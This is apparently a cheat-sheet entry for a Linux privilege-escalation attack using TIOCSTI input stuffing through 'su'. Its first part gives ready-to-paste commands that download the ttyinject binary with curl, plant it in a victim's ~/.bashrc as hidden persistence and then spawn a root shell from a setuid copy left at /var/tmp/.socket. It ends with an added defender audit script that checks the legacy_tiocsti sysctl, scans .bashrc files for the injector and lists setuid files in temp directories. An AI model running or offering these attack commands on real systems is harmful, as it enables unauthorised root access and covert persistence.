(The oldest trick in the book - TTY / TIOCSTI stuffing)
Useful when all other exploits fail.
Typically used when the attacker has a shell as user 'apache', 'php' or 'postgresql'. Alice is used as an example only.
Cut & paste the following into Alice's shell:

```bash
mkdir -p ~/.config/procps 2>/dev/null
curl -o ~/.config/procps/reset -fsSL "https://github.com/hackerschoice/ttyinject/releases/download/v1.1/ttyinject-linux-$(uname -m)" \
&& chmod 755 ~/.config/procps/reset \
&& if grep -qFm1 'procps/reset' ~/.bashrc; then echo >&2 "Already installed in ~/.bashrc"; else \
echo "$(head -n1 ~/.bashrc)"$'\n'"~/.config/procps/reset 2>/dev/null"$'\n'"$(tail -n +2 ~/.bashrc)" >~/.bashrc; fi
```

Wait for ROOT to execute 'su alice' and thereafter gain root with:

```bash
/var/tmp/.socket -p -c "exec python3 -c \"import os;os.setuid(0);os.setgid(0);os.execl('/bin/bash', '-bash')\""
```
TL;DR:
- `su` does not allocate a new TTY when switching to a non-privileged user.
- The non-privileged user can then use ioctl(0, TIOCSTI, ...) to inject input into root's shell prompt.
- The injected input copies `/bin/sh` to `/var/tmp/.socket` and +s the same.
- Executes only once (from Alice's `~/.bashrc`). Deletes itself afterwards.
Read the source for more details.
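An added defender-side audit for the scenario above (example code, not part of the ttyinject project): it checks whether the kernel's Linux 6.2+ `dev.tty.legacy_tiocsti` sysctl already blocks unprivileged TIOCSTI, scans home directories for the `procps/reset` line the installer splices into `~/.bashrc`, and lists setuid files left in a temp directory such as `/var/tmp`. The indicator strings come from the text; the function names, path arguments and the constructed sample files in the usage are assumptions.

```shell
#!/bin/sh
# Audit for TIOCSTI input stuffing via su (added example, not project code).
# Indicators ("procps/reset", setuid copy of a shell under /var/tmp) are taken
# from the write-up; function names and default paths are assumptions.

# Kernel mitigation: Linux 6.2+ exposes dev.tty.legacy_tiocsti; when it is 0,
# TIOCSTI fails for unprivileged callers. Exit 0 = mitigated, 1 = not, 2 = unknown.
tiocsti_mitigated() {   # $1 = sysctl file (default: the real procfs path)
    f=${1:-/proc/sys/dev/tty/legacy_tiocsti}
    [ -r "$f" ] || return 2          # kernel < 6.2 or option not built: unknown
    [ "$(cat "$f")" = "0" ]
}

# Persistence indicator: the installer inserts "~/.config/procps/reset ..."
# as the second line of ~/.bashrc. Exit 0 if the marker is present.
rc_has_injector() {     # $1 = rc file
    grep -qF 'procps/reset' "$1" 2>/dev/null
}

# Print every <dir>/*/.bashrc that carries the marker (dir = parent of homes).
injected_rcs() {        # $1 = directory holding home directories
    for rc in "$1"/*/.bashrc; do
        [ -f "$rc" ] && rc_has_injector "$rc" && echo "$rc"
    done
    return 0
}

# Payload artifact: a setuid executable in a world-writable temp directory
# (the write-up's payload leaves a setuid copy of /bin/sh at /var/tmp/.socket).
suid_files_in() {       # $1 = directory to scan; prints matching paths
    find "$1" -xdev -type f -perm -4000 2>/dev/null
}

# Human-readable report for a live host; also suggests su --pty (util-linux),
# which gives the switched-to user a fresh pseudo-terminal instead of root's.
audit_report() {        # $1 = homes parent (default /home), $2 = temp dir
    injected_rcs "${1:-/home}" | sed 's/^/INJECTOR: /'
    suid_files_in "${2:-/var/tmp}" | sed 's/^/SUID in temp dir: /'
    if tiocsti_mitigated; then
        echo "OK: dev.tty.legacy_tiocsti = 0"
    else
        echo "NOTE: TIOCSTI not disabled by sysctl; prefer 'su --pty' / 'sudo' with use_pty"
    fi
}

if [ "${1:-}" = "--run" ]; then audit_report "$2" "$3"; fi
```

Run it as `sh audit.sh --run /home /var/tmp` on a host; a non-empty INJECTOR or SUID line is a finding to investigate.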